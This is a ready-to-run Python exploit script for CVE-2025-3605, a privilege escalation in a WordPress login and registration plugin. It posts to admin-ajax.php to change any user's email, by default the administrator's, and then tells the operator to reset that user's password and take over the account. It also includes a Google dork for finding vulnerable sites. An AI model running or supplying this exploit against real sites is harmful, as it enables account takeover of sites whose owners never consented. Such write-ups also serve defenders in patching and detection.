# Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation
# Google Dork: inurl:/wp-content/plugins/frontend-login-and-registration-blocks/
# Date: 2025-05-12
# Exploit Author: Md Shoriful Islam (RootHarpy)
# Vendor Homepage: https://wordpress.org/plugins/frontend-login-and-registration-blocks/
# Software Link: https://downloads.wordpress.org/plugin/frontend-login-and-registration-blocks.1.0.7.zip
# Version: <= 1.0.7
# Tested on: Ubuntu 22.04 + WordPress 6.5.2
# CVE : CVE-2025-3605

import requests
import argparse
import sys

def display_banner():
    banner = """
  _____   _____   ___ __ ___ ___    ____  __  __  ___
 / __\ \ / / __|_|_  )  \_  ) __|__|__ / / / /  \| __|
| (__ \ V /| _|___/ / () / /|__ \___|_ \/ _ \ () |__ \
 \___| \_/ |___| /___\__/___|___/  |___/\___/\__/|___/
    """
    print(banner)

def suppress_ssl_warnings():
    requests.packages.urllib3.disable_warnings()

def initialize_session():
    new_session = requests.Session()
    new_session.verify = False
    new_session.headers.update({'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"})
    return new_session

def parse_input_args():
    parser = argparse.ArgumentParser(description="Exploit for Privilege Escalation in Frontend Login and Registration Plugin <= 1.0.7")
    parser.add_argument("--target", "-t", required=True, help="Target URL to exploit")
    parser.add_argument("--target_user", "-u", default="1", help="User ID for target (default: 1)")
    parser.add_argument("--new_email", "-e", default="example@gmail.com", help="Email to change to (default: example@gmail.com)")
    return parser.parse_args()

def generate_payload(user, email):
    return {
        'action': 'flrblocksusersettingsupdatehandle',
        'user_id': user,
        'flr-blocks-email-update': email
    }

def execute_exploit(session, target_url, payload):
    try:
        return session.post(f"{target_url}/wp-admin/admin-ajax.php", data=payload)
    except Exception as error:
        print(f"Request error: {error}")
        sys.exit(1)

def process_response(response):
    if response.status_code == 200 and response.text.strip() != "0":
        print(f"Exploit succeeded! Response: {response.text}")
        print("Next: Go to the Forgot Password page and reset the admin password using the new email!")
    else:
        print(f"Exploit failed. HTTP Status: {response.status_code}, Response: {response.text}")

def run_exploit():
    display_banner()
    suppress_ssl_warnings()
    args = parse_input_args()
    session = initialize_session()
    payload = generate_payload(args.target_user, args.new_email)
    response = execute_exploit(session, args.target, payload)
    process_response(response)

if __name__ == "__main__":
    run_exploit()